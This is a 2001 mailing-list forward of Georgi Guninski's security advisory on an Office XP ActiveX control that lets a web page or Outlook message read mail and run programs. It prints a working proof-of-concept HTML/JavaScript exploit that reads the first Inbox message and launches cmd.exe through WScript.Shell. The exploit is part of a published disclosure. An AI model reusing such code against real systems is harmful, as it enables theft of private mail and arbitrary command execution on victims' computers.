IP: New MS innovations: Was Microsoft Office annoying me...

[David Farber <dave@farber.net>]

>
>Date: Fri, 13 Jul 2001 10:35:42 -0400
>To: farber@cis.upenn.edu
>From: David Chessler <chessler@usa.net>
>Subject: FWD: New MS innovations: Was Microsoft Office annoying me...
>
>* Original: FROM..... Seth Milder
>
>Office XP just got more annoying:
>
>
>------------------------------------------------------------------------
>Georgi Guninski security advisory #49, 2001
>
>MS Office XP - the more money I give to Microsoft, the more vulnerable
>my Windows computers are
>
>Systems affected:
>Win2K + IE 5.5 SP1 fully patched + Office XP.
>It was reported to work with IE6 beta also.
>
>Risk: High
>Date: 12 July 2001
>
>Legal Notice:
>This Advisory is Copyright (c) 2001 Georgi Guninski.
>You may distribute it unmodified.
>You may not modify it and distribute it or distribute parts
>of it without the author's written permission.
>
>Disclaimer:
>The information in this advisory is believed to be true based on
>experiments though it may be false.
>The opinions expressed in this advisory and program are my own and
>not of any company. The usual standard disclaimer applies,
>especially the fact that Georgi Guninski is not liable for any damages
>caused by direct or  indirect use of the information or functionality
>provided by this advisory or program. Georgi Guninski bears no
>responsibility for content or misuse of this advisory or program or
>any derivatives thereof.
>
>If you want to link to this advisory or reference it use the URL:
>http://www.guninski.com/vv2xp.html
>The above especially applies for companies like Mitre and BugNet
>
>Background:
>
>Recently I bought Office XP.
>It was quite unpleasant feeling giving so much money for so buggy
>product.
>
>Description:
>
>If a user visits a specially designed html page with IE or opens or
>previews a message with Outlook XP arbitrary commands may be
>executed on his computer. This may lead to taking full control over
>user's computer.
>Using another approach to this bug allows reading, modifying and deleting
>messages in user's Outlook XP folders.
>
>
>Details:
>The problem is again ActiveX. This time Office XP seems to install a
>malicous ActiveX control - "Microsoft Outlook View Control".
>This control exposes property named "selection" which gives access to user's
>mail messages. It also exposes the Outlook "Application" object which
>may lead
>to execution of arbitrary programs of the user's computer.
>Examine the script below for more information
>
>Demonstration:
>http://www.guninski.com/vv3-2demo.html
>-----------------------------------------------------
>This assumes you have at least one message in Outlook XP's Inbox
>
><object id="o1"
>    classid="clsid:0006F063-0000-0000-C000-000000000046"
>
> >
>
><param name="folder" value="Inbox">
></object>
>
><script>
>function f()
>{
>//alert(o2.object);
>sel=o1.object.selection;
>vv1=sel.Item(1);
>alert("Subject="+vv1.Subject);
>alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
>alert("May be deleted");
>//vv1.Delete();
>
>vv2=vv1.Session.Application.CreateObject("WScript.Shell");
>
>alert("Much more fun is possible");
>
>
>vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
>
>}
>setTimeout("f()",2000);
></script>
>-----------------------------------------------------
>
>
>Solution:
>Uninstall Office XP and Windows.
>
>Vendor status:
>Microsoft was informed on 9 July 2001.
>As far I could understand they are still investigating my report.
>
>
>Regards,
>Georgi Guninski
>http://www.guninski.com
>
>
>--
>Seth Milder
>



For archives see: http://www.interesting-people.org/